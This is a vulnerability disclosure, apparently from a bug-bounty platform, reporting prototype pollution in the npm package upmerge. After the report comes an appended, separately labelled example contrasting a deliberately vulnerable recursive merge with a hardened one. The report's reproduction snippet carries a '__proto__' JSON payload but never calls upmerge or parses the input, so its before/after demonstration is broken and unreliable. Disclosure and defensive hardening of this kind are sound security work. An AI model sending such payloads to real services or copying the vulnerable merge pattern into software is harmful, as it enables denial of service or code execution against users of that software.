Prototype pollution attack (upmerge)
Discovered by dienpv on Nodejs-ecosystem

This issue took 4 days and 21 hours to triage and 79 days and 19 hours to resolve once triaged.

Hi team, I would like to report a prototype pollution vulnerability in upmerge that allows an attacker to inject properties on Object.prototype.


- module name: upmerge
- version: 0.1.7
- npm page:

Module Description

> JavaScript Object Merge and Clone for Client or Server side


Vulnerability Description

> This vulnerability type is similar to my report #438274. upmerge is vulnerable to prototype pollution when it merges objects.

Steps To Reproduce:

> In the following code snippet, "payload" would come from user-input (JSON data).

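```javascript
var upmerge = require('upmerge');
// User-supplied JSON carrying a "__proto__" key
var payload = '{"__proto__":{"polluted":"upmerge_done !"}}';
// Fresh object; "polluted" is never assigned to it directly
var test = {};
console.log("Before: ", test.polluted);
console.log("After: ", test.polluted);
```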

# Wrap up

- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N


## Impact

It causes Denial of Service or RCE in some cases.
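
The merge pattern behind this class of bug, next to a hardened form, as an added example that is not part of the original report and is not upmerge's code. `naiveMerge`, `safeMerge`, `BLOCKED_KEYS` and `demo` are hypothetical names, and the payload is the report's with a constructed `name` key added.

```javascript
// Added illustration: constructed code, NOT upmerge's source.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Naive recursive merge (hypothetical). For the key "__proto__", target[key]
// resolves to Object.prototype, so the recursion writes onto the shared prototype.
function naiveMerge(target, source) {
  for (const key in source) {
    const val = source[key];
    if (val && typeof val === 'object') {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      naiveMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened merge (hypothetical): own keys only, prototype-reaching keys skipped,
// and recursion only into objects the target itself owns.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (val && typeof val === 'object' && !Array.isArray(val)) {
      const owned = Object.prototype.hasOwnProperty.call(target, key);
      if (!owned || !target[key] || typeof target[key] !== 'object') target[key] = {};
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Runs both merges on the report's payload shape plus a benign key, then
// removes the polluted property so the process is left clean.
function demo() {
  const payload = '{"__proto__":{"polluted":"upmerge_done !"},"name":"ok"}';
  const safeResult = safeMerge({}, JSON.parse(payload));
  const afterSafe = ({}).polluted;   // prototype untouched
  naiveMerge({}, JSON.parse(payload));
  const afterNaive = ({}).polluted;  // now inherited by every plain object
  delete Object.prototype.polluted;
  return { safeResult, afterSafe, afterNaive };
}

console.log(demo());
```

Where untrusted JSON must be merged, creating targets with `Object.create(null)` or freezing `Object.prototype` at startup limits the effect of a key filter that misses a case.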